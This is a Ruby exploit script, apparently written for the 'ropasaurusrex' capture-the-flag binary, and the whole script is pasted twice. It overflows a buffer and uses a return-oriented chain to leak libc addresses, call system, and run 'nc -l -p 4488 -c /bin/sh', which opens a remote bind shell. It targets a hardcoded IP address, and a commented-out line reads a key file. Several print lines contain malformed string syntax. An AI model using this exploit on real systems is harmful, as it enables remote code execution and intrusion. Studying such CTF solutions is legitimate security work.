iagox86/sploit.rb

## sploit.rb
#!/usr/bin/ruby

require 'socket'

read  = 0x0804832C
write = 0x0804830C

ptr_write = 0x08049614
pppr = 0x80484e4
writable_data_section = 0x08049620

bytes_to_write = "nc -l -p 4488 -c /bin/sh\x00"
#bytes_to_write = "cat /home/ropasaurusrex/key\x00"

offset_execlp = 0x263a0 # offset from 'write'
offset_system = 0x85d40

i = 0x08049614
addr = write
params = [

  # Read the 4-byte address of 'write' so we can calculate execlp
  pppr, # return address (pop pop pop ret)
  1, # handle (stdout)
  ptr_write, # buf
  0x00000004, # length

  # Return address for the pppr
  read,

  # Write "bytes_to_write" to "writable_data_section" (ie, write the command that will be passed to execlp)
  pppr, # return address (pop pop pop ret)
  0, # handle (stdin)
  writable_data_section, # buffer
  bytes_to_write.length, # length

  # Return address for the pppr
  write,

  # Write "WIN" to the console to make sure things are working
  pppr, # return address
  1, # handle (stdout)
  0x08048510, # buf
  4, # length

  # Return address for the pppr
  read,

  # Write the 4-byte address of execlp to writable memory (the address of 'read' right now)
  pppr, # return address
  0, # handle (stdin)
  0x0804961c, # buffer (address of 'read')
  4,

  read,

  0x48484848,
  writable_data_section,
  writable_data_section,
  0
]

sploit = ''

sploit += ("A" * 140)
sploit += [addr].pack("L")
sploit += params.pack("L*")

#s = TCPSocket.new("localhost", 1025)
s = TCPSocket.new("54.234.151.114", 1025)
s.write(sploit)
write_address = s.read(4).unpack("L").pop
execlp_address = write_address - offset_execlp
system_address = write_address - offset_system


puts("execlp address: x"  execlp_address)
puts("system address: x"  system_address)

s.write(bytes_to_write) # write our data to a known address
s.write([system_address].pack("L")) # The function to call

puts(s.read(3))

#s.write("pwd")
puts(s.read())

#system("nc 54.234.151.114 1025 < file")
#system("./ropasaurusrex-85a84f36f81e11f720b1cf5ea0d1fb0d5a603c0d < file")
	#!/usr/bin/ruby

	require 'socket'

	read = 0x0804832C
	write = 0x0804830C

	ptr_write = 0x08049614
	pppr = 0x80484e4
	writable_data_section = 0x08049620

	bytes_to_write = "nc -l -p 4488 -c /bin/sh\x00"
	#bytes_to_write = "cat /home/ropasaurusrex/key\x00"

	offset_execlp = 0x263a0 # offset from 'write'
	offset_system = 0x85d40

	i = 0x08049614
	addr = write
	params = [

	# Read the 4-byte address of 'write' so we can calculate execlp
	pppr, # return address (pop pop pop ret)
	1, # handle (stdout)
	ptr_write, # buf
	0x00000004, # length

	# Return address for the pppr
	read,

	# Write "bytes_to_write" to "writable_data_section" (ie, write the command that will be passed to execlp)
	pppr, # return address (pop pop pop ret)
	0, # handle (stdin)
	writable_data_section, # buffer
	bytes_to_write.length, # length

	# Return address for the pppr
	write,

	# Write "WIN" to the console to make sure things are working
	pppr, # return address
	1, # handle (stdout)
	0x08048510, # buf
	4, # length

	# Return address for the pppr
	read,

	# Write the 4-byte address of execlp to writable memory (the address of 'read' right now)
	pppr, # return address
	0, # handle (stdin)
	0x0804961c, # buffer (address of 'read')
	4,

	read,

	0x48484848,
	writable_data_section,
	writable_data_section,
	0
	]

	sploit = ''

	sploit += ("A" * 140)
	sploit += [addr].pack("L")
	sploit += params.pack("L*")

	#s = TCPSocket.new("localhost", 1025)
	s = TCPSocket.new("54.234.151.114", 1025)
	s.write(sploit)
	write_address = s.read(4).unpack("L").pop
	execlp_address = write_address - offset_execlp
	system_address = write_address - offset_system


	puts("execlp address: x" execlp_address)
	puts("system address: x" system_address)

	s.write(bytes_to_write) # write our data to a known address
	s.write([system_address].pack("L")) # The function to call

	puts(s.read(3))

	#s.write("pwd")
	puts(s.read())

	#system("nc 54.234.151.114 1025 < file")
	#system("./ropasaurusrex-85a84f36f81e11f720b1cf5ea0d1fb0d5a603c0d < file")